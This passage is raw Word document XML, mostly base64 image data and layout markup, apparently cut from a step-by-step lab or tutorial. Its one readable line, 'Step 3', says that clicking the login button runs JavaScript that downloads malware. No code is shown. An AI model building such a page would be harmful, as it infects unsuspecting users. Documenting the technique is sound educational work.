#10;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&#10;vpjFoLNU/6fPvg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030&#10;nCwEAADFDQAADgAAAAAAAAAAAAAAAAA9AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAKAAAAAAAAACEA&#10;hZkOVLzwAAC88AAAFAAAAAAAAAAAAAAAAACVBgAAZHJzL21lZGlhL2ltYWdlMS5qcGdQSwECLQAU&#10;AAYACAAAACEAOExOHt0AAAAFAQAADwAAAAAAAAAAAAAAAACD9wAAZHJzL2Rvd25yZXYueG1sUEsB&#10;Ai0AFAAGAAgAAAAhADedwRi6AAAAIQEAABkAAAAAAAAAAAAAAAAAjfgAAGRycy9fcmVscy9lMm9E&#10;b2MueG1sLnJlbHNQSwUGAAAAAAYABgB8AQAAfvkAAAAA&#10;">
                <v:rect id="Rectangle 4380" o:spid="_x0000_s1306" style="position:absolute;left:59448;top:32560;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7CEB0711" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 4381" o:spid="_x0000_s1307" style="position:absolute;left:4571;top:3420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0E318D87" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 4382" o:spid="_x0000_s1308" style="position:absolute;top:36233;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4D0DD7B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 4393" o:spid="_x0000_s1309" type="#_x0000_t75" style="position:absolute;left:383;top:127;width:58737;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9WyxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvgt9heUJvuokW0egqIhU8FWpT1Nsj+/IHs2/T7DbGb98tFDwOM/MbZr3tTS06al1lWUE8iUAQ&#10;Z1ZXXChIPw/jBQjnkTXWlknBgxxsN8PBGhNt7/xB3ckXIkDYJaig9L5JpHRZSQbdxDbEwctta9AH&#10;2RZSt3gPcFPLaRTNpcGKw0KJDe1Lym6nH6NgnqeP97f8UtRxfLaX4/Ww6L6/lHoZ9bsVCE+9f4b/&#10;20et4HW2nMHfm/AE5OYXAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAAR/VssYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
                  <v:imagedata r:id="rId102" o:title=""/>
                </v:shape>
                <v:shape id="Shape 4394" o:spid="_x0000_s1310" style="position:absolute;left:256;width:58991;height:33312;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5899150,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txAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/RagIx&#10;FETfC/5DuIJvNVuVardGUUEp1BdXP+CyuW6Wbm6WJOru35tCoY/DzJxhluvONuJOPtSOFbyNMxDE&#10;pdM1Vwou5/3rAkSIyBobx6SgpwDr1eBlibl2Dz7RvYiVSBAOOSowMba5lKE0ZDGMXUucvKvzFmOS&#10;vpLa4yPBbSMnWfYuLdacFgy2tDNU/hQ3q2DTn7aLtjRHz9/zw+6S9bG/FkqNht3mE0SkLv6H/9pf&#10;WsFs+jGD3zfpCcjVEwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAO350O3EAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,3331210r5899150,l5899150,,,,,3331210xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3331210"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E332AFA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C04B773" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251715584" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7274BF34" wp14:editId="03D8148C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="43520" name="Group 4352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20" name="Shape 499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1" name="Shape 499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2" name="Shape 499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3" name="Shape 499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4" name="Shape 499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20" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49925" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49926" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49927" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49928" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4992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6608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1398ECA5" wp14:editId="6CBB28BE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="43521" name="Group 4352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30" name="Shape 499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1" name="Shape 499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2" name="Shape 499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3" name="Shape 499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4" name="Shape 499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21" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49935" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49936" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49937" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49938" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 499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1BFE8FB8" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDC50A0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120DC83E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00F97B52">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1340" w:right="9991"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10836" w:type="dxa"/>
        <w:tblInd w:w="-801" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="801" w:type="dxa"/>
          <w:bottom w:w="182" w:type="dxa"/>
          <w:right w:w="734" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10836"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F97B52" w14:paraId="4126661C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="15766"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10836" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="double" w:sz="6" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="double" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="6" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="35C7BC41" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="239" w:lineRule="auto"/>
              <w:ind w:right="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Step 3: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">When the user clicks on the login button after entering username and password </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>javascript</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> code gets executed and Malware gets downloaded </w:t>
            </w:r>
          </w:p>
